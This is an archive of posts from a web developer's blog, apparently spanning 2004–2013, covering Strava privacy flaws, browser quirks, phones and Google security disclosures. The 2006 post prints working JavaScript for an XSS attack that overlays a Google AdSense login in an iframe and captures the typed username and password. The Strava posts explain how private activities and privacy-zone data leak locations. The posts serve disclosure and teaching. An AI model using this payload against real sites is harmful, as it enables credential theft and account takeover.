Archive for the 'Javascript' Category

Strava “API” and privacy leaks.

Monday, July 8th, 2013

I previously had some pages which used the Strava API to do useful things for me, the one I used most was seeing who rode climbs together, it simply used the API to see everyone who rode a segment and then tracked their start times so you could see who was riding with who. It was also really useful to see changes in time between groups in a race. ie the break started a lap 2 minutes ahead and then next lap only 1 minute.

Strava killed their previous API though, and despite an initial promise from them for me to have access to their new API if I agreed to remove their embarrasing GPX export service which revealed the private zones of peoples rides, I never got access, they just stopped emailing. (The privacy flaw was in their export, not in anything I did…).

I’m stuck here now without access to the useful features, so I’ve started looking for a replacement. I don’t have access to their new APIs, and in fact I don’t think I’d bother investing the time in them anyway, once bitten… But I started looking at the services they use to populate the pages themselves. An immediate thing hits me, their page API allows access to private activities.

Accessing private activities

Here’s a private run of mine, you won’t be able to see it, however here’s a JSON file of the exact run. So as long as you know the ID of a users ride, you can get all the info about it. It also completely ignores the privacy zones you have configured when exporting a private ride. A public version the same as the last run this has a privacy zone (it’s only hiding a sports club which is the start for these races, it’s not my house!) and you can see from exporting this one that the points within the privacy zone are reset to 0,0 rather than the actual lat/lon. Yet on the fully private activity, those same points were available, private activities actually provide more risk to revealing your location than public ones.

Private rides are just security through obscurity, and the ID’s aren’t even that obscure, don’t give Strava data that you actually want private.

Distances within privacy zones are provided

Another privacy flaw here is that while the lat/lon’s on public rides in your privacy zone are hidden, the distances you travel for each of those points in the private zone are not, so it’s a pretty easy algorithm to get back to very close to the start of your ride/run unless you do some laps inside your zone or something similar to obfuscate it. Altitude is also provided for the points within the zone, so that may reveal more for those of you who don’t live in flat lands.

Strava Lack of time?

Strava have repeatedly said their reason for not supporting old API’s or for providing access to the new API is lack of time. I guess I can now believe this, as they don’t even appear to have the time to invest in even basic honouring of their privacy assurances. I did try emailing them before publishing this, and then tried twitter but still no response.

Exporting GPX from Strava

Monday, September 5th, 2011

I knocked up a greasemonkey script to get GPX routes out of Strava, to help you know exactly where the segments start and finish. The script lets you Export GPX rides and segments from Strava. At the moment it’s very rudimentary with just the route being created. It would be quite easy to add way markers or course points to it to highlight when you were approaching the start or finish of a segment, but for now I just kept it super simple.

Don’t serve JSON as text/html

Wednesday, July 5th, 2006

Another day, another XSS flaw, this one in Google again, but this is a little more interesting than the normal ones, what this one shows is how JSON results add an extra vector to attack that might be missed by your QA team.

The problem here was that the JSON was returned with a mime-type of text/html, a browser will render that as if it was an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript recieved by the XMLHTTPRequest object is returned with a suitable mime-type - application/json That will mean even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.

The google exploit was reported here, it’s at the time of writing unpatched, unfortunately that was down to the discoverer not giving google any time to fix, whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously, they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, the everything on a single domain causes problems, it means any exploit anywhere on the domain, allows you to exploit any service provided for the domain. This exploit is also present in https:// google, so to re-enforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing. Here’s a simple demonstration of using the exploit to steal username and password from google adsense.

The exploit is simply used to create an IFRAME that fills the document and points it to a google adsense login, when the user logs in, the username and password are alerted - also after logging in, then the “today’s earnings” are alerted. Of course a real attacker would not alert these fields, but would sent them off to a site to be collected later. Are google adsense passwords useful? Would you notice if the address or account to get the cash changed until you’d not got the cheque?

The script code is simple, you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></div>";

function go() {
  try {
  var win=window.frames[0];
  win.document.body.style.overflow="hidden";
  win.document.body.style.border="0px solid white";
  var doc=win.frames[0].document.forms[0];
  doc.onsubmit=function() {
   alert("Your adsense username and password are:n"+
   doc["Email"].value+'nandn'+doc["Passwd"].value);
   x=window.open(location.href);
  }
 } catch (e) {
  try {
   var win=window.frames[0];
   var doc=win.document.body;
   var x="Today's Earnings:"+doc.getElementsByTagName('h1')[0];
   alert(x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
  } catch (e) {}
 }
}

The result is clear:

From Shiny to Orange…

Friday, August 5th, 2005

Fresh from my shiny experiences, I’ve now joined the Orange people. T-Mobile, who I’d happily used for years, finally sent me too many spam text messages, so I had to leave, I chose Orange, thanks to some Lobbying from a friend who wanted to go to the cinema - Orange Wednesday gives customers 2 for 1 cinema tickets for 10p sms charge, and someone else recommended the deal available.

It’s a good deal, and now aswell as my Nokia 1100, I now have a Nokia 6680, it’s a videophone, so I made my first Video call, and completely pointless it was do, I had to get dressed to make it, I had to look at the screen, rather than wander around the room, and the quality wasn’t good enough if someone was trying to show me something actually interesting. It’s unlikely I’ll ever make another video call…

The nost annoying thing about the 6680 though is that it interferes with the audio on the TV when it’s being used, it’s a cheap TV, but GSM phones don’t cause it any problems, and the 6680 in GSM mode don’t cause it a problem. I think other than when I’m using data, I may well keep the 6680 in GSM only mode, the battery life is miles better, and it doesn’t interfere with anything, I certainly wouldn’t recommend 3G for anyone else, stick with the cheaper GSM phones, smaller, neater, better battery life, and more reliable. The 6680 also comes with no games, not even snake, this has depressed me about Nokia, it looks like they’re pandering to the networks to encourage more people to buy downloaded games, they should remember who their real customers are.

Opera 8.0 and wireless IRC have been installed and are working nicely though, The Symbian Opera 8.0’s javascript support looks really good, and the xml http request object works nicely, with all the examples, including the newly added one, working well.

Wot no body { background-color:white; } ?

Sunday, July 24th, 2005

Yesterday I had a good day at opentech which was good fun and met lots of intersting folk, but I missed an opportunity to ask a Yahoo Search bod - Jeremy Zawodny why their search site didn’t bother setting a background colour, so instead, I’m going to start what’s hopefully not a regular look at sites which fail…

All of the major brands on the web other than Amazon failed to do the most basic QA on their sites, and all of them suffer from developers who don’t really know the common pitfalls of designing. I don’t know why this is, but please sort it out, it really looks bad for your brand - go back to your style guides, and read the bit where it says white backgrounds…

The RTW Ticket Route Planner again

Sunday, June 19th, 2005

As I didn’t bother linking to the routeplanner last time, I thought I’d mention it again. So here’s a link to my Round The World Route planner

Starting a new project

Saturday, June 11th, 2005

Scene: A typical office, two people Bob the project manager, and Jim the javascript muppet.

Bob: So Jim, we’ve got another project needing a thin client frontend to run on the desktops here, perfect for another of your HTML weblike frontends.
Jim: Oh cool, I’ve been wanting to try out XForms for that.
Bob: XForms? what are they then, I thought HTML, CSS and javascript was what you did?
Jim: Yeah but I’ve heard about these new things called XForms, apparently they make everything more semantic and easier to maintain.
Bob: You’ve heard? you realise we only have three weeks development in the schedule?
Jim: Oh I’m sure it’s simple, I met a guy in a pub who told me how easy it was, I’m sure I can pick it up.
Bob: Okay, if you’re sure the benefits are worth it, this will work with all our current desktops right?
Jim: Well we’ll need to roll out a new XForms client to all of them.
Bob: Ah, so which client do we use?
Jim: Well, there’s lots to choose from, I’ve heard there are more XForms clients when the standard came out than anything else, so it must be good?
Bob: So which is the best?
Jim: I dunno, give me a few days research time and I’m sure one will turn up.
Bob: So how much is that going to cost us?
Jim: I dunno, There doesn’t seem to be pricing info for most of the XForms players, still the beancounters aren’t doing much at the moment, they can find that out.
Bob: Hmm, but there’s plenty of examples of other people using these XForms in web solutions for us to learn from, right?
Jim: Not that I’ve found, but there’s a specification.
Bob: Okay… If you get hit by a bus, there’s plenty of other people out therewe can hire with the skills to maintain it though?
Jim: Don’t think so, but I’m sure it’d be easy for them to learn it too.
Bob: So, let’s recap. Instead of using the tools we’ve used to successfully roll out tens of projects and people millions, you want us to pick a new technology you know nothing about, with immature implementations that we don’t know the cost of and will need to roll out to every desktop, and there’s few examples to learn from. Then, even when you’ve written it, we won’t be able to easily hire someone to maintain it as the skills are rare, and you don’t think the risk to the project is too high?
Jim: Sure, it’ll be fine, I need to learn the technology sometime right?

Bob walks away and picks up the phone.
Bob: Harry, call up HR, we need a new javascript muppet, this one’s gone a bit crazy.

The disappearance of the background colour

Thursday, December 30th, 2004

A long time ago, the webs background colour was a really quite ugly shade of grey, and all was good with the world, as everyone remembered to set the background colour to what they want. Now of course the background colour is white, and no-one remembers - to remind me to always do it, and to make plain text and XML files render easier to read in my browser, I set mine to nice mellow yellow colour. This means I now see so many sites with weird colours, and not crappy little personal sites, but big corporate sites with big web budgets, but obviously no QA. Searching for “com” in google should return some of the major sites on the web today, and what do we see Yahoo without a background colour… Other sites I’ve noticed recently are citibank, AOL, EasyJet.

I’m sure many of these sites spent thousands just on the meetings to pick their brand colours, and then they go and ruin it by not setting the background white? Quite apart from the risk of people with a background colour that doesn’t play nicely with the text colours they choose.

Google have finally fixed it.

Wednesday, October 20th, 2004

Google seem to have finally fixed the flaw sometime around 6am today, not bad only took them a little over 2 years, so good to know they’re responsive. Actually it seems from the logs that it made it into the google bug tracking system around 4pm yesterday, so 14 hours from then to fully rolled out is actually quite impressive, what’s not impressive is the failure of the security@google.com address and the lack of any phone numbers to contact them.

Google did eventually get in contact with me by email at around 7PM yesterday, 3 hours after they knew about it and an hour after the bugtraq posting they didn’t seem to be overly concerned and claimed “to be aware of the issue” combined with their lack of thanks of me drawing their attention to it suggests that it was actually a known bug they’d just neglected to fix. They said they’d look in to why my security@google.com emails failed to elicit a response, but seemed mostly concerned about getting me to take the exploit page down - I declined that request, it didn’t seem worthwhile as the exploit had by then been mentioned on lots of other sites, so it would’ve done nothing to aid security.

The fix they put in place is still flawed, it relies on special casing the vbscript, javascript and perlscript strings, meaning other language protocols are still at risk in IE with its multiple scripting language capability. The risk is obviously much lower as very few people have other scripting handlers registered, but it could still be used as a vector to attack a corporate installation with known other script engines. What I don’t understand is why instead of blacklisting various strings, they don’t just require it to start http:// - what other protocols do you want in an image on a customised google?

Hopefully Google will get in touch explain what went wrong with the communication of the issue, hopefully google will realise that a phone number of the security team on the web would also help (After trying to explain to Tesco customer support a few years back that there was a non SSL credit card collection problem and getting absolutely nowhere, I’m not going to call normal people with security issues, they don’t understand them) I don’t actually expect them to get back in touch though, they weren’t exactly friendly. Perhaps not surprising as to them it seemed I went public before informing them, but a trivial hole that’d been there for 2 years, I had to do something to get it fixed.

The talks that didn’t happen…

Monday, September 13th, 2004

I’m going to do a full write up of the conference some time soon, but while I remember, here’s a few of the talks I wanted to see but didn’t get a chance too, as the presenters couldn’t make it.

Up first, as I mentioned was Locus (PDF report) hopefully we can get the source code for it, as it’d be great to run this at SVG Open 2005, where the university is covered in wireless. More helpful here in japan perhaps, where the lack of phones (for us visitors) made meeting people all the harder. We had IRC though.

Jonathon Phillips was meant to talk about the Open clipart library, I’d not really looked at the library before, but it’s great, a really high standard of artwork with lots that I can actually see using.

I’m sure there were lots I should’ve seen that did happen, but spent my time in other rooms, I’ll write up the highlights of the ones I did see soon.